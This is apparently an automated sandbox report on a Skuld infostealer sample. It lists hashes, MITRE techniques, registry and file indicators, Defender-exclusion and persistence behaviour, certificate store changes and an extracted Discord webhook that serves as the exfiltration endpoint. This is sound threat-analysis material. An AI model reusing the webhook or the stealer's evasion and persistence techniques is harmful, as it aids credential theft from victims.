skuld | 1df1d464c60159d1f0a02571c7f04a9869c452886186e11855623ead8426f09a

Analysis

max time kernel
150s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-08-2024 21:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Size

9.9MB
MD5

95195d793136baf958223b01eb7eddeb
SHA1

4e63a49059afb533468d8d0a4534d010c00ed53d
SHA256

1df1d464c60159d1f0a02571c7f04a9869c452886186e11855623ead8426f09a
SHA512

80f734742f2e18e91b57a8f69a0cbb4e4a0d1a973ae7dd6788168db2f30ebbdf01f288a2ef48cb905b8029a83cb5a1c92ec66f4985c059f8cb715abd2195fc2c
SSDEEP

98304:Ba2Xu0Ar3AklXZoVtMliFoF9UEEMESICafZm7jsENj/:Bc0Ar3AVQliFovUTlPKj/

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1273592346264731691/my7VXvQGMB9nvucOZRTO98e9LgCU2Ww2mU9UF21cqXO4ZcL0djYZoldFuOx0CMSFaz-D

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4704	powershell.exe
1428	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	api.ipify.org
4	api.ipify.org
9	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3496	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2888	wmic.exe
2032	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	10	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe
Token: SeIncreaseQuotaPrivilege	3272	wmic.exe
Token: SeSecurityPrivilege	3272	wmic.exe
Token: SeTakeOwnershipPrivilege	3272	wmic.exe
Token: SeLoadDriverPrivilege	3272	wmic.exe
Token: SeSystemProfilePrivilege	3272	wmic.exe
Token: SeSystemtimePrivilege	3272	wmic.exe
Token: SeProfSingleProcessPrivilege	3272	wmic.exe
Token: SeIncBasePriorityPrivilege	3272	wmic.exe
Token: SeCreatePagefilePrivilege	3272	wmic.exe
Token: SeBackupPrivilege	3272	wmic.exe
Token: SeRestorePrivilege	3272	wmic.exe
Token: SeShutdownPrivilege	3272	wmic.exe
Token: SeDebugPrivilege	3272	wmic.exe
Token: SeSystemEnvironmentPrivilege	3272	wmic.exe
Token: SeRemoteShutdownPrivilege	3272	wmic.exe
Token: SeUndockPrivilege	3272	wmic.exe
Token: SeManageVolumePrivilege	3272	wmic.exe
Token: 33	3272	wmic.exe
Token: 34	3272	wmic.exe
Token: 35	3272	wmic.exe
Token: 36	3272	wmic.exe
Token: SeIncreaseQuotaPrivilege	3272	wmic.exe
Token: SeSecurityPrivilege	3272	wmic.exe
Token: SeTakeOwnershipPrivilege	3272	wmic.exe
Token: SeLoadDriverPrivilege	3272	wmic.exe
Token: SeSystemProfilePrivilege	3272	wmic.exe
Token: SeSystemtimePrivilege	3272	wmic.exe
Token: SeProfSingleProcessPrivilege	3272	wmic.exe
Token: SeIncBasePriorityPrivilege	3272	wmic.exe
Token: SeCreatePagefilePrivilege	3272	wmic.exe
Token: SeBackupPrivilege	3272	wmic.exe
Token: SeRestorePrivilege	3272	wmic.exe
Token: SeShutdownPrivilege	3272	wmic.exe
Token: SeDebugPrivilege	3272	wmic.exe
Token: SeSystemEnvironmentPrivilege	3272	wmic.exe
Token: SeRemoteShutdownPrivilege	3272	wmic.exe
Token: SeUndockPrivilege	3272	wmic.exe
Token: SeManageVolumePrivilege	3272	wmic.exe
Token: 33	3272	wmic.exe
Token: 34	3272	wmic.exe
Token: 35	3272	wmic.exe
Token: 36	3272	wmic.exe
Token: SeIncreaseQuotaPrivilege	2888	wmic.exe
Token: SeSecurityPrivilege	2888	wmic.exe
Token: SeTakeOwnershipPrivilege	2888	wmic.exe
Token: SeLoadDriverPrivilege	2888	wmic.exe
Token: SeSystemProfilePrivilege	2888	wmic.exe
Token: SeSystemtimePrivilege	2888	wmic.exe
Token: SeProfSingleProcessPrivilege	2888	wmic.exe
Token: SeIncBasePriorityPrivilege	2888	wmic.exe
Token: SeCreatePagefilePrivilege	2888	wmic.exe
Token: SeBackupPrivilege	2888	wmic.exe
Token: SeRestorePrivilege	2888	wmic.exe
Token: SeShutdownPrivilege	2888	wmic.exe
Token: SeDebugPrivilege	2888	wmic.exe
Token: SeSystemEnvironmentPrivilege	2888	wmic.exe
Token: SeRemoteShutdownPrivilege	2888	wmic.exe
Token: SeUndockPrivilege	2888	wmic.exe
Token: SeManageVolumePrivilege	2888	wmic.exe
Token: 33	2888	wmic.exe
Token: 34	2888	wmic.exe
Token: 35	2888	wmic.exe
Token: 36	2888	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 836 wrote to memory of 2108	836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe	92
PID 836 wrote to memory of 2108	836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe	92
PID 836 wrote to memory of 992	836	2024-08-24_95195d793136baf958223b01eb7eddeb_ngrbot_poet-rat_snatch.exe	93
